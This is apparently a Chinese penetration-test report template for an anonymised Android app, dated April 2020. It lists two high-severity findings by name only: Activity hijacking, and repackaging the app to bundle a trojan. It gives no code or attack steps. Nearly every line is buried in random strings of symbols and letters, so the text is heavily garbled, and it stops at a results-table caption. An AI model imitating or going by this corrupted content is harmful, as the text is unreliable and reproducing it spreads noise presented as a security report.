* S7 c4 V5 S; o
& o8 s4 S3 b! ^! A. V9 }
( Q$ O$ P3 m# }8 e% j V- X( N( U: F" t. \4 g6 @) v
2 }, C1 D. `, H- c' @8 y
" `; r9 @6 H) K
5 @, B! {, q, {, P
+ z- f/ g( F' h
2 q( ^7 D9 G+ O' Z, `
, s" }% ~% b2 E8 O
5 L7 A4 i2 x) U2 \9 T* u3 H1 g- x
文档编号: 2 A& E8 O7 n j; Z
4 M0 q3 y4 ]- v( q: d' C
( I6 {+ n9 |; P0 i: y9 j6 L
# i9 N# t5 ^. y* n5 J ^8 f " s/ ?- G! F# |
; B6 ^/ l( F# V% K. b. S) E
! B3 F$ }% R- N) y, U x3 }, }" C
; G5 ?1 T3 N' _, G) [
- X2 r9 m; p/ A" F
1 c/ {: v; r# `8 k2 M
- E: D( M( o, K8 ?4 y+ r5 p) H) d9 ^6 a, w. M, x
+ o, q$ b; Y- v
) J d8 x* B8 X* t+ h* r: Z! q
% h! g' N' l$ V t$ J' M
5 }/ J1 M6 d3 {" \" ^# I5 V
6 c; |& p; c- V4 C9 C+ X5 q9 X; W4 @
4 b1 V9 F: M$ @- A0 c& k6 x
% |- r: \2 A ?# U! u! g8 {6 @
, }9 q; W: n5 R" y2 c8 O. M
. A9 S# o$ D1 o# |
' M2 c2 q# C$ h& _- ^
J& }5 C# Y. ^* d
0 |5 q9 z% {: [) S3 O6 ?) c% S. {) B) d* z3 O* b
: Z0 O* O. }! R, w7 v8 P7 n
0 y$ h, d% q( t3 W/ T! |
6 H6 ^* a& s3 P u3 ]
: `3 q) ~8 a$ N& ?# K. ?2 j" T1 b
6 w3 o, Y }7 ?" g
! j* a& g" Y. W% Y/ Y
1 H5 x# { R# ]/ n
j! `- X; |3 h0 r
Y J- Q8 Z/ j0 X, k3 Q0 U
) X$ K) p3 n( V( M 某某某APP渗透测试 8 j2 x; m1 J' ~9 B% G) W2 E
0 g ^, v) W0 E' q) B) Q/ d
, }$ N$ x! l' I; J4 J
) j" ?9 v& x7 t! J+ J1 U9 q
8 D6 L6 R, q+ [4 `& D. ~# F. E7 ?: S- ]
/ a9 C; D _; Y" K7 C7 C
8 _8 a! I/ {0 C2 `
5 y; U5 {7 c+ m9 B) Y& U% h% `2 x: ? s' I% }9 |% n5 `4 f& X
5 o3 f9 ~& B: Q
& V9 ~& I7 @6 |5 I* ~$ I/ x
5 S/ x; L* h+ Z9 r& q' Q
2 H* T" v5 E: O8 w
) c3 v$ G) l( x
# [2 d# L3 h( k: \- F+ N, o
# L( I' f! v& d: c" V. s
+ ~. B% I0 b8 n; p
( V3 h W8 o( p3 z3 ?* y
+ [+ o' ?$ N' v
! F- I$ l+ x; T& h2 l+ h; z
$ w1 R m& Q6 }5 Z ' F% d2 W4 F8 _2 r/ d, l
" b, P; u' O- t0 {) s2 n4 n8 F
/ ^ l+ z' [ O( Q1 M9 j. r2 S R: @8 }% S9 R5 K/ e: e
/ e* W8 }/ {$ J( I
. }* O- A, p* r- |( S- P: }; W , N4 y. g1 R: R
9 G! X `- m3 v# f- ` 技 术 报 告
5 v8 |3 \, _9 D; F5 n, g8 k
) |3 d8 f3 C$ N, U3 V6 B
. X) V3 X7 i5 F3 u9 w2 I- d1 ~' K
5 Y) j& Q. G' t y: I * [' m2 N. ^; L/ o/ b. C5 L0 |
8 q& u2 D$ f7 @; B! v# e
+ t- h8 J- k/ @8 @$ {- K3 Q
1 B3 O5 P" P9 Q4 M
' H. ], Q5 A2 q4 |- k) j2 L( d& \3 X" c; p3 o4 S" J
, p9 g, h. y8 S& m6 [& ]9 }
' e$ G7 X6 w/ k8 D) X8 \- s 2 m' C& A( s$ r! @& v* F
7 | l! c3 _6 `/ O# {
' [2 Y1 O3 ^# c$ `
% D) L- G/ r( W/ v& V8 K4 ^& P
( M0 | I; x3 [: I7 y8 E: D4 o9 }& h1 L& M7 M0 a% [8 j( E
7 g3 N% P0 n' q# _
, q- H" D1 W4 v7 a
5 K( s8 V$ X; E# H& L
* H: B/ F. U% b4 L! H/ }" h
. p# `( |' V2 M
# H; ^' A& c+ A- X
% ?# Q3 X3 |% M& g
, B5 j$ e6 \2 e. O
; i$ n# h* j- V# ?# V5 ?
( ~4 B9 f/ Q5 @ k. k) |3 V
& Q) y' P( m6 _+ K4 Q
6 T6 \6 x. X; \3 O7 v) V" U
8 X- b% F/ \% P) Q
* `/ `7 B. s5 Y& p
9 ?% X) F6 ^/ P; f" R3 B' m
. _# J7 s1 _: q+ z( Y1 T/ X 3 R( [9 p, F3 R1 s+ h/ w! Y x
5 i- n' ]/ A% p& ^5 i. U) K
1 J* s- j/ _5 U9 O+ k) h
5 g f. t: m; b4 G8 Z. l/ S
* X# W) d$ m# U0 X
5 P/ J3 G$ X: \9 e( Y, ]* s : A9 r U( E/ @( i
k- Q$ S6 @& @3 P; H- J# {' o! g 7 ~3 N" s. U" t: y+ {
) R! y! i# W: O, k* o( G; W
: b0 k6 `( a( ~/ m
2 v1 @) L7 a) j- \$ Q4 ?* B. t
3 y: ?1 }* h; l) D2 j) T
& \0 w' F1 {: j 2 \# q4 ~6 f1 V) l' D1 R
& {$ W: R: M ]3 {8 m4 s- S1 ]' o
2 f" T2 s1 l6 _( F8 h. ~
8 I. Y& H, T- ?4 b7 ~- \
% M& f) b/ k, ?/ ^, t
q' G0 X( s& i6 A5 E " X8 N! G J8 T! u3 T: W
( b8 j4 J+ C8 L( H+ c4 \
# W% ^( @1 U4 T) ?1 _8 Q N7 p9 r2 n+ P+ l& C. T& o
5 u, v0 R& k' u# v: G2 N- }6 [
! u$ J3 {! u- t- z
9 m# g6 m7 F; }3 o+ q0 Y" E8 q/ I8 G9 d6 p7 N3 R I5 r
4 C, W% t4 H: T
! y) Q- f. ?/ o0 t2 ]* N: k- z 3 o5 B8 e( i: R
! A# S- c" w" P: H' b Z8 X
4 F1 j. v. D% { v! s6 T& F% W# [) Z
/ `" q( L7 X1 l; k1 M" R; d
5 k/ F% k, O) z; |
' ~ T3 o5 p% t; w
7 U) J; W! u7 r( W - E" s# j6 \6 V8 {! P! d
1 w# n/ l# h) l0 d$ u
# T/ [; F+ Z. ]& j
, o. M3 k0 f& t' D2 L3 w* K# j! V
( ?1 L# @ C6 A' `
7 b$ j1 m/ Q, w4 h0 E 9 `: x6 n# I. Q q
( |( H7 T0 |+ z" s) x; r7 s
% }; H! t* n' @* [1 i
( ]$ R6 v; F) N9 }# g
% v2 h9 r* W+ z: O( n& F* T$ _& s3 Y( N, l8 ^( l- g
. s( x/ O. {. R ?
, |. S9 D# X+ C" K, k
5 L$ W. N' y4 g: P& V
& {7 W% q* q4 t9 y% A+ U/ F 7 |0 N5 Q0 @* K/ H$ p$ N
; w) H3 m8 `1 D2 f
0 m& ]3 F$ Z6 A+ I; l! _( N2 f( R7 b2 x5 p1 T! C5 ?2 h$ }* A( \, y/ t
o( n; o& v6 ^) k1 c
3 d4 H0 S$ v1 F2 g3 E
3 K* ]. ]4 [7 b) A* { V" o
& Z/ |8 T! ~, C+ } 0 W2 K8 j- G* ^$ y9 i* b& z/ L
8 W1 A7 ?8 ^' n- R. e: ?2 m
5 `' A7 o D k, G9 P; ~6 R3 z* S7 ?5 ` S! P
, C" T e/ J z9 w& J
! e+ r, J3 l: [# x1 a
2 k9 f0 d* y9 e& u# j
( S; W" N8 x: n& w$ H/ T4 k' X0 x
- A& V7 Y/ v! x" ~0 M" M9 x3 J6 D% V: a; y# T
3 f; t2 y, ^) g0 _# K. w8 U& @7 G
( |6 w5 o @4 [1 b' G" D + B }8 H ^7 t" y2 v( \- C& ~
8 _. \9 F0 w% d. k# |
) L: L' Q; \: S( o' k
) ~$ C H! |# C8 G% A. m7 m- k2 f
0 S" V! m; f4 `) O; A* T# U
" f0 G* k2 I* s9 {% w# x; b) o 二〇二〇年
: f3 c* @4 u# ]$ X/ [5 v/ A E9 U0 m7 J
* F8 I( [/ B8 I# A
, E; c) H' q% ?0 W+ q9 M9 p; R, @. o4 b 1 ~; _# C+ P# V4 d* |' W; Y/ D
7 u% T$ z( l4 |( t& C
+ m0 X% @+ }' i7 J+ h9 Z! E0 z5 v0 ]+ L. R
8 p. s+ K/ Q9 n1 T4 D- |
. T* G3 |+ j& x) m1 n' L7 Q
+ }% C( [- y/ d; _
3 X. v( H; q$ |0 w$ P
/ b4 w R$ G$ g3 @3 k. C& t# J
0 y: O3 `, g0 {+ a5 t3 q. M
# [" ?3 n; C9 O7 q1 C) `8 @( @* b8 Y7 h! [
4 C- k6 b$ }& `* D4 I
, F6 F9 o3 h+ O$ ?( g
4 F' C- \( c% y2 w0 B% J% p" {5 N% K, ]" i+ E9 o, l% X. c- z
* L, v+ G! c3 {& {! |
+ Z8 W) z/ b9 ]3 g0 Q: H s1 T* a 目 录
/ e8 Q3 \! K1 j" L; w* k5 u
" s' |' S7 ~. L1 S: `
( R+ D4 U+ h0 \. R% ~
0 y9 n- V, P" v" P& c* _/ D5 U$ K
7 c+ H( O* X* l# P' F7 L" j5 A( i* E9 g- U
; `: M/ Q" H7 L5 r( K& l" U7 r; Q0 h) ~1 n. B
. f9 \' K! `5 B2 f3 H
R0 w' q+ K& r
$ O$ s& [! P+ _: L7 { z5 h$ K4 S9 G) t, c
2 A0 U& [9 ?* n+ i9 E _! m0 p
$ F4 T: z( e5 F6 t/ A5 f 1 概述... 3 ( f- W$ X( l+ \6 [
2 G, L; W) o& x$ L( H. ~$ k
" e% c$ h: O7 j O" E0 H8 w Z8 ^# _$ v5 I' U% y* ]2 i% E
% r. s7 M5 a4 s; u+ d+ q+ a. X
$ g5 G. z6 A; ^* v2 A 1.2测试时间... 3 ( j* Y i! P, Z9 h/ t* \+ l# O
) |+ D6 z; A2 k4 Q- \# ~- ?1 J
' i1 m- @5 j# ]; `8 L. A
( ?/ _4 ?' u3 F$ c k
$ y) P! Z6 {, @: I$ m# \
* d2 y; Z8 k; s% g8 m 1.3测试对象... 3
- a9 ~7 H# F* g+ C, z0 s. H: n& n5 p2 w- N2 n: n
1 d( K+ e7 C) ?7 K' f) z& C& O$ O/ X! N* Z' r& r$ Q, z/ D
$ j W5 C' [9 c2 e0 W( L' x9 a' t
1.4测试结果... 3 * c4 k5 x2 ?) J" |3 m' C
9 F5 L+ S$ M! Y, s
$ F- D& z/ M0 p- W
! L, q0 K$ z4 o& z 9 j, m' m l/ J( T7 `
% [, S( v& f% I) q. q/ F7 g
2 检测结果... 4
" a: |) }5 S% X q+ ]+ e8 H: ^9 F# X( T5 W
! A( @' M! R% j9 }$ y# k' z+ L1 t% T E. h) F2 j
- _3 n5 |* k) \) d: t5 p. U
0 I2 e& C$ K5 ?
2.1 某某某... 4
5 q7 }7 N% G: Q1 x b O9 y% u9 s; r: W3 s% _' l
) ^6 m7 n! Q4 C; h
3 ^$ ~ f. ~0 g( W) C* U$ ^
/ s; h2 j% U) R" w+ i2 n$ l# b1 o1 y0 k' _/ R$ l2 m* j2 M
2.1.1检测目标... 4 5 Y5 d3 O$ Q& z
( W. A$ m+ i8 N+ P
5 {: }' y' Y/ o/ R S; K3 G/ d2 [. Y2 x' d. c3 N$ i1 t9 ?" y, v
. s# y+ j* W8 h4 i( E7 O, Q
& d& J- ?1 t+ V: [ 2.1.2检测结果... 4 2 H/ V7 {" p8 ]' k$ @
6 _+ I! x0 r! Y8 x# d/ K
4 q8 m6 ~. t+ w4 E9 m4 ~- F
$ ]9 n' }* u% L' N& q/ E. f
% y1 |1 f! n& g( S; D
2 w5 k+ X' F: y/ X( b( C5 J 2.1.2.1. 4
7 r7 ~+ R, g! C9 a' I b7 \/ z4 Y* l
* ]6 }/ J2 x4 R0 ?$ ~9 Q
, s7 D' Y! u% j9 H# g% n( B& O: T. A3 k8 J
, {' F* Y7 T3 `* r
0 N6 g3 A+ j3 g( j* V 2.1.2.2. 6
; Q) H" r# T0 ~6 ~/ K8 ~. T" u- s6 g1 O
" Y$ N! h& d( c2 q$ S
2 H: Z5 W0 N* E
6 T, L7 K0 A$ E; G; [! t6 Z! N2 v8 a
4 V. X8 c& H- q+ A
3 P; Q8 ]% |, X/ q9 V
7 N( f- t) {: O( d) H8 Y& \( [; O
8 O- {8 e C4 X1 \
" A6 J2 M/ B7 t- `8 N" S
, O% B& P! Y# N
, R- X H' `+ U3 p* p) x: G% B
2 |: ~' w! W4 G; n: p+ ^" e& Q
2 W( D7 Z" N) q0 g7 F
2 D- h( ]; \. W& y1 e: o
& j+ S+ O$ K: ?, w1 P* h 8 v* F# b* `" j% p
' {. G* P. {) m! W0 _9 J. x7 u 1 概述
. {- E, [; L2 s' {: b* i) U k3 ]& t* u, A* Q5 G
8 t/ o, n- _$ Z( e% a" W; |8 A1 n9 {* _5 F; U( {. M- I$ v
W" C1 T+ _5 H4 D6 Z: r& x3 R1 _
' m1 Z- e) [' t* { 1.2测试时间 : H( {" j- o1 m
, C% m- a, J( [/ S* G# _
( {& {) r% [/ e; h/ n
} T' Q/ v& N; J: }6 t! n' a1 q - [. ~. f2 Q; N
! l* U8 `* B( G4 ?+ J! }
4 [' K% @( U* W8 Q* d7 \
' g! W1 J- Q6 e ) \$ L3 ?! I6 a2 j# @- [
* h& K+ ?0 r$ Z: Y/ P$ g | ) Y6 O! l" L+ b8 V- ~" Q- Q9 G H
9 l, h: g0 S6 N9 p
1 [3 K! l- x( A% ~& n9 T& O
e+ @. H+ \9 {1 K
渗透测试时间
, v( ?- ^+ `4 q& p. U* Y
8 m. N) Y" L/ b5 u
$ t9 z) h5 b+ b$ y
* U, Y, L+ |+ u4 o0 P8 j K. j |
6 i4 S8 L* t0 P" V+ z: d+ p
/ V& [( M8 P+ ~: A, H1 U7 x+ w
0 u* L' w' H$ X. H% f8 L
+ f) k* E/ p( d; [( x9 ^0 n
; a3 @* E9 `; N- n- r, b, `4 F
4 I+ ~9 P* S7 c. ]6 X. F4 V |
i- b# j+ C: M" D3 f& v3 E! V5 a% M, Q8 s4 [; G2 z2 n/ Y
: O: c4 s4 g4 D4 A& C% y' B
8 P b1 K, }2 a 起始时间 ; x$ k4 Y9 h: m
6 b5 | S; }1 B
2 z/ }! e" F8 y2 y3 X
( a7 X7 L9 S9 z5 J' K& i | 2 x# s; f* g2 K
6 f' p/ V& w4 Q, `* ?' G% t' _
* W! a! ^& V8 X1 S0 g
- ?8 H+ ^, ?+ {( v' D9 d6 ?
3 T' n1 n }8 S4 Z. W* S* N# p, D g h1 w
2020年4月6日 7 F! {4 r& i# D
8 E- k* I- J+ S* v! ]
9 ?& R! ]5 T, K! M- I: y; l" U T* }% P# e
|
3 A/ H( t7 y/ B B* Z& P! B$ c* H. T6 y8 F
" ]/ y3 p3 g' A K9 t# M% ^1 N2 i1 e# [$ @5 @
) j+ ]( E r# ]- P, T/ ^4 o4 d# @# q8 |
|
- r. d; K' i$ y1 l5 L1 ~$ m8 ^+ e( q
" r2 r) Z; Q& U( Q# w
; j6 g5 ?1 v, o5 i1 X3 i
结束时间
% U- A2 }0 C% S! t% ^
& F$ W9 {* N" w9 T* o ! n5 q! V3 v, Y& C w
6 o* ` b( a) ^! X2 O |
* G# {, s4 }1 z" B
" p4 I5 i2 O# X- I/ o" J
5 L9 `7 E ^% X( X8 P* h# Z% v2 g; y+ N+ k# H8 v. i- D
7 W% L) A& X, Q0 v9 f2 }
4 d* U+ j) ^4 ~( N% l 2020年4月9日 6 h/ q; P8 z; `6 A8 j+ a
$ F2 l' x1 W/ G$ h* ]
, }: b* t( d2 Y7 n
2 c% R9 I' a" d
| $ Y! d1 j) w; D* _, [" K" J3 S f
/ T" j- H) j2 C9 d
; A( |+ j7 Z. U) O( O0 V, `4 H
- Y3 C& S2 b2 [
6 O' X# C: t; `9 Z( d# L+ W r% h/ n% W& p7 \
6 A: `$ A* g Z* f1 |' ]3 A0 W! C2 F+ o% e1 H
: [4 ~4 F9 v8 v% _' u9 t) H/ H* W
" h4 i: S- i6 J$ [: F 1.3测试对象
- w: G5 B- J2 l- e1 f h- M6 y I5 ?4 W5 f# i3 }& F: S
5 V' h# F4 O9 {. X% h) [
, y- \5 L8 ~7 z5 a
) R( }, \3 v" A s+ v5 s1 X6 \2 A5 f
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: ; e* R4 _- {% @( F
8 Y. D9 v/ a3 {! z1 h
. C' c: b2 c! |+ @* u, I5 n* y1 r$ Z/ x* V
$ W' U6 [) h: u2 R' N* _% Q" ~8 g
- F' K+ v2 ?3 W+ M, I. V) u0 g& N, @ 表1-1 检测对象 1 O9 R9 m* B" U) P( q( j. J$ f
% P. n4 |8 k8 `! o' q' K
( J! K; i% }/ @8 s! r$ D. w) h/ I' W1 o- F. H+ l. T/ }
4 X7 Q6 \% x/ [7 N; @
`- Z$ O! l: Z7 U! @1 _1 ^ e
) X$ n8 _9 p7 Z& U( \; ^+ E7 K
1 d8 ^4 D2 \( l( i4 M
& G$ i" r/ u4 v; @. _$ D% E( P$ v" |! {) O. {
|
I4 ~, F; V) g9 U' T0 Q: m) U% V/ e# Q7 ~' n" ]/ K: _; |) a! c
, T$ S8 [8 M8 c, S( o8 Q0 A0 q3 @# R0 q" O
序号
6 @9 o# T. k* ]& n( C( N, c* o* E& x3 h# _, W' a& d$ T1 K4 ?# h
8 m1 Y, ~+ {: u; ~* g5 b- B4 {( \" G0 v9 m' \# f) P) D5 w
| , M3 V0 J( f* P, M
- G) k* V* `9 n$ } Y, {6 b+ i8 q+ H. \* Q- y; f5 x
3 v5 {! M' M# y+ h
/ l6 F, i6 ^" q* B# E( _; Z5 ^; h$ |, p! ^! Q& d: {% U1 @/ i) o# l
测试对象
, m, m6 G" B8 Y$ n& b) x$ B( u* |& G+ b) q% S6 M
) o) r3 b" L+ f2 z o0 S+ ^+ S8 f, Z4 y
5 {6 }0 ~1 S# @ | % Z) d6 H3 n+ {+ u. t
! C/ @: u# `3 F6 \ Q8 E
5 H0 @3 b' {* g, n' p K2 f Z: L% c
6 D' T% K; w1 v. [
" a) c# ^: L7 R+ e+ F& E) V 测试地址
2 R. @9 A. W' F
5 h7 h; Y8 r0 T$ |
7 g6 h" m8 w9 g9 S0 Z
% s$ p7 m- C8 O | * m0 p( {/ M- ~% x" B9 P/ L9 B
+ i5 X! D* Q& o3 j( a1 X
0 t( F) f+ Z* T: k: _
$ ~! r2 S' g( Q
8 d N9 W9 w9 G0 G8 }# ?; c z4 o0 w3 A$ y" p# O
安全漏洞
+ b/ y, }6 q, a& F
. b- ^0 }1 S e1 O$ m, B
, v, v) C( \. d( x6 |& j
- ~; c4 I9 [. Y2 w | 6 q: j6 A* p: O3 v6 }1 y
' i( n3 ~/ h: t8 ?! k3 n6 V" d: ^
% [( v( f5 U+ [. q
1 m7 S2 p3 _; U4 f/ [5 D+ F , L& o: N# N% U# h0 c2 Q$ ^3 `
$ U. w/ c9 {9 y5 D% W0 g |
* O5 h2 K* \: q! u* v8 _' o/ d. ?2 v: ?& V
0 z3 ?; ^1 f& Z" l' `! E% A' D
1 J$ j8 D: q' t+ O0 H+ u9 y7 b 1 9 z. p8 t- n& a7 ~1 U! T
+ B6 ?3 n: k9 H. X
: O. v1 P: w7 z; v ~
: @, ~7 A. U' C, R) g# k0 i' P% \- X |
5 i2 \" N: K# i k; T( S+ W( X* @& J+ L1 E: E! u
- t& Q! D: v B9 {4 g2 v+ T9 E# l
6 g4 ^ j8 _4 R( G 6 z. D* q0 Z7 k
6 n4 J a, _: h
某某某安卓APP
7 R5 L1 g) h9 ]+ D$ n0 {' Q+ m" ^
. ~/ r. ?- g0 a$ k 0 P' ~8 R2 e8 _# ]& U
7 G# y# z0 ~6 U1 A+ d& T4 X3 n
|
7 ~+ U7 I0 p7 K) l5 q9 W+ T0 Y+ w1 Y' _0 q1 M
: j; L, Q: c. r5 S; s
& l% |& ^* H* ~8 q; i- C. `) c" i 0 y6 ~* V- w: @/ `
4 [% ?% T* }/ X+ f2 C. M8 A
" x+ v' L% [' ]
; z9 k- P6 S& B8 d& C 4 ~& U5 _7 F4 i! m+ {
$ U) u8 h1 S' ~2 _2 k! v! g
|
0 P$ W( ^$ a: d+ X0 V( s
9 g' C# h m. v
5 Y) s: J2 L" ?0 h" v
: [" Z/ |: K& R3 b
- i7 n- \. J6 M3 C8 v, O3 w/ A5 W( W: ] y& h+ X2 q- N
2 + ^% {8 i- i- K4 i% Q
# p# f0 F+ ^( ~- i! O- R, T ' p7 t5 o- g: E" a/ A# j- K. n: N0 s
- N; |0 _9 j/ F, _( h2 Z, {- i
| ! n& @9 g f3 ~% ?) J" U
% r* O" z& b1 \& }& b
1 r$ i2 M3 x0 G* [" A( M, o
! n# J9 F( U5 N
; O. p1 b4 e2 `# w
% N4 A$ z! X' p+ Y
9 _. D: i0 B( R; _1 ?- i# s) [9 R$ w! _* R& m9 W# H
3 j, a4 ^' L. }. H" J3 A; l! W0 N0 K
1.4测试结果 ( U/ ]6 P; t t* K
( {" j) o- ]4 a7 O: l' j# U/ C0 d
F: F4 L0 L) J0 T
6 e8 U4 x: w) g$ ^ `
! _8 X3 T. M1 U: {* ^' K8 V) Q( G: h3 c# g+ Q0 M/ C
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: + V, |- J% f& x+ L n
& ~& c5 O1 M2 y! `/ @, z3 O8 l
9 M9 F( E- W# A# z- t1 f
1 F4 a/ h' ?8 H' Y9 ?4 M, `
* n, l) }9 |. ~( [( S. @
1 l% E) Q$ ] Q6 n
4 I6 X9 H& \% D% @# x8 g7 U- Z3 `- e) Y5 M i: M- m. S C
. t9 Y% W# r$ S6 z: S
9 g& p" V4 N$ |7 t9 Q( d
( F4 o9 c7 h5 U: P4 r; c8 p
- w1 x" @/ _9 f
( O, a* G9 u! l1 B ^! X4 @! u6 N
9 \5 B, b9 I: m( O( y. Z
% Y$ |& M y" o8 z2 P 8 W4 h9 {- F X2 F7 j
5 d$ d7 c& j; [
| ' V* b7 R+ s/ D8 i* `2 U8 `
! T5 L* R' S' z/ b ~+ Z; X P 3 H- [7 j% Y/ q& P$ R
/ C( O2 v( y. Q1 k8 k 序号
% X3 }9 {' J. H1 I' j; ~* z
) \1 r! Q4 Z( c2 w ; |# M$ z; _% d A+ m2 g1 G
" r& N* S- s. v) t/ Y0 O* K6 u
|
& B* b- g. Y2 _% k2 f; q
# @: u5 T9 P F # t; i+ J# d R0 m3 m5 N! _9 Y
8 Q6 e6 R/ j! p: T
& R; @, x" P: ?
+ {& X- a1 N# [1 q. K# | 系统名称
3 Y+ E( e! f, I
' R2 h6 m# E. P 4 G# y& c+ Y& m$ o
% \ F( H& @0 h H | # c& J7 d8 I" a" W3 N
# I3 \1 ]6 b% M. G \) Z1 w
% ~# M9 n- j. X- Q) g* M! c8 L' M
; c4 N. A* Q1 {1 p( ]! ^
% Z X \1 k0 _ o
; m* ` y# z1 \0 f* r6 Q( x6 P$ C
漏洞名称 5 X4 M3 v# H0 v% H4 T/ [ \6 i
5 n& `0 D1 n: v4 ~( ?# a
( ?9 `& o9 D8 ]. t. o; m
4 O' s. H, B' J/ G | . t# b* J* J+ D/ {, x1 A9 }7 B
! Z% m% g c3 W) h* Z: N% \% @ 5 @& b; v1 Q4 [: I/ J
! t7 c- ~! ~* Z$ }
. H" F2 c, D! w' h4 e" a/ B0 n" h7 [' K) T( w5 o* x Q
漏洞危害
3 O8 T; }3 C' {. b A; y
2 L, V( H% x+ E3 ?5 T& X9 u 2 k7 C' E; f% y2 P. Q- T
( r$ `" v1 |# T# U | ! Y0 b0 ?: U1 ^3 g# v
5 O8 s7 x0 F i0 o5 D* B, e * j0 `) _" P" f3 y) N& l# B" F8 y
7 Y. f- G+ x3 ?. l& s# \0 i
' n, q! j4 c+ S; U' A) u5 R) m
G; k' a2 I" z. d1 d0 T0 R3 k u
修复结果 6 l* l4 a' L* l' ?5 i
0 {: q. n" O6 C9 t) I
5 H% E$ j& L1 R& d. E. M2 O, u2 @% X: q- J
| * I& P7 \- y# x1 z3 B# |
+ ^) U5 |" X0 ], V4 S
\2 w+ D8 Y1 w: Z4 M1 I
& t ?3 S& w6 ]. h, c8 r
! T# b0 J9 ^1 e* L! ~' k
4 r6 J5 h6 [: Q6 l | & M3 m) S' s( U5 T5 f
0 ^# ~) v5 p. _, y k+ H4 y- T
* k4 d, y, b L! l7 M4 y8 A6 ~- b# X/ T$ ^9 ]
1 7 Z" V! G6 {: O1 s; w3 N# D
! o8 i' V/ N7 T# `
! X4 x/ S3 R% B- H/ }6 V
! W! J! ?; w0 B8 i: {! J7 n* n+ H |
9 n; Q( O: N0 \) D2 \6 b
9 b, R3 f# c/ R; ] # c+ t e7 Y2 {+ Y# x( n
' j. a# M3 q7 X" A8 @
% p, _- l$ E' m |: o9 @* k7 X0 T# _0 \0 [5 C* R8 D
某某某某某某APP 4 A* @) n l! t2 @/ O8 q
3 F3 q5 @3 ?. }- r
6 Q; _0 D9 e+ b0 s Y: {
3 Y4 V, O" T$ ?: N2 V | 6 Y% _# A# d! M D3 n4 C
; l' v4 V+ u' Y& N$ [ 7 m, M: Z; L V
: M1 |0 Q- g' k: ], q0 H + n: C. O2 {1 t% m1 J. }
$ f( G5 R8 W7 w. H& Y. a. L, _
Activity 劫持
# q5 s0 [% t/ u' H e: K
; N" C) X1 o/ v: v9 h7 E
6 Y5 g+ Y3 x* i. l w% d7 j0 _' s! v4 X9 Q5 a# F4 \/ g
5 Q( ~+ I# P9 Y; ?% G. k" Z
, ^* Q3 N$ L& Z" ~, b6 a5 ]* K7 D+ h
% \. ^2 {( V9 d& g
P- C' |" A: k% a& X: Z
7 U+ k* P4 M' {) {( v% k+ b8 b$ N5 v3 a! K! ]
|
' @: r- P6 B2 M' _4 {
/ G- t2 {# X' E3 O& O, y0 X ' B5 _1 H+ ~& X7 ^% F6 V
0 D- t: X. m' [' n$ Z
3 [, Z3 E! u' t% O& q9 w: q9 K+ g* K: h& `) W1 W
高 ( g4 {+ g1 v( u4 [" o% }& e
6 f! [# ], X- ^# [& O
( B; h; j! c4 Z. M( t" {& X5 D) g o9 `7 B
| ( x0 Y5 O/ o; H( y
7 d: Y9 M* I( c# i& w" g& E& F4 {
7 [$ Q) c( U6 c% w0 U5 C E
+ c7 b6 u% [, N6 L8 V" Z. _, d
2 J" ^: e. T3 R3 g
# z. x* y, X) l$ m
7 ?$ X: V4 }! M v/ o. C6 A0 u0 r
5 _- d* k. B9 p6 ?# Z( i# w ) J- C( ?) u( q$ W- N
0 f1 k! s' U8 Z- k g9 K. l: ?
|
* ^# X7 Q& q. k4 I A- L
2 N2 d7 }/ M4 n1 h- E2 [ H
. m( C# l) r3 M9 W! Y
- V4 f. u# {- {' h" R$ g
) W9 D) ~/ U2 [* E
+ J% X4 l. P" a1 i+ {5 w- P | 7 `5 X) r2 r4 h- W( N @' p5 p
# Z7 I0 M4 a' `( X; b
; L/ C2 f }. j7 O1 w! w$ V
- x$ a9 X* b _ y. ` 2
9 M, l5 n/ Y, ^8 Z, Y
" |4 Y, M, V; c( N$ G9 K# i7 ` @
* k/ I$ S, Y& `) B- {8 N! q/ N0 o% h: B2 \+ e8 o& B/ Q2 @$ _, m
|
1 d p8 ]* W# ]2 J
$ ^! E3 m2 E; W4 r$ [$ G3 I+ S( g2 p
# D( F( ^0 ~+ |% H$ U6 p U0 }6 P) E% W7 A" J" Q4 X' g+ S
( ?2 J/ O% ~3 l( S0 O7 V# U8 ^" s9 D
某某某某某某APP
7 h' v& `, S5 q: A9 Y5 v: R1 L- C5 F; a$ T! u3 I
' ~' B5 p/ B' b( k! V0 h
6 ~- U) `7 l! B) T m
| ! T, I# T2 h/ R4 T! k6 Y* b/ t
& L7 J) t9 R9 b& c1 ?, @1 Q
( n# I. p5 u R* w3 a+ b" ?! g6 G2 P7 @& P
8 W8 A3 f0 Q% _$ B
# U- U8 v( U$ |8 W5 B 反编译二次打包捆绑木马、篡改APP代码 % n# B6 {, e, D) b( W
0 D. c! O: W) t6 _ 0 ^5 x* ^* ]( y
/ L G7 D9 n& u1 t5 Y7 b3 | | * P/ L' d5 X1 B# W( S
. y) j4 ~4 |* z5 h. x
: O# t- y( L$ ?" D _, i
8 n& O8 [" x$ b" F: q3 w ' H( T, E+ @2 W! Z" t
4 y& C& d$ [& m7 T7 B) q 高 % `9 `) j U a+ ^
1 F. J+ Y# X+ I+ o" X
/ h4 ^8 A# S5 _" ?6 G( J4 G. P: V0 Q, T# y
| 2 ^$ A# n& a6 m! A
$ \& |1 p4 @ R3 r; d; {. ` ^
6 g) z/ t& t% w4 l, ^6 i* D, R+ o8 {/ ?' g1 b) k3 w
8 \/ m' n8 N- Z' |# R
) w% y" |: `) Y: @8 w" y5 I( D8 \ F) g1 l8 d! L* X2 H
8 H; E% J8 u2 l; Z/ F7 I
# e! n/ U$ x. @: v" Q! d- v
* a8 E8 l" A+ x& A0 L& r( \( l9 K6 X
|
J. k( v% J. Q6 x1 U! a/ |: a
) Z; J% Y2 g( Z) B ^! A# P; u
# [1 O5 E1 O0 N, L% ?+ G' Y
; [0 z) ?; b0 f) s* a
4 W( K, O4 F3 x% v/ l
' x3 D1 \* n0 ?& y8 p! c
: c# w+ x& C; Z& t6 o* q
' G/ _, p) x: D0 C% b6 X
1 b2 f' v4 v8 h$ g% ?' m3 ~) H
5 A2 y4 C% k1 b/ Q- T7 B
2 r3 T2 V$ ^! h+ r1 X! ^2 c; f
* [, Z" R/ y# S1 H8 l, D) }! A
& b6 I& n' |* t9 k3 Y- E/ S
6 x0 }6 Z4 C0 O- M
3 t9 h$ j- L9 ~5 M' D" A8 @$ `! [) c- Q& F% J: e
6 ?; e/ k! @ i5 e2 v3 h; K! B6 f+ m
表1-2 测试结果 # L; t. [! |+ i3 b
& L( r9 M( Q( I n
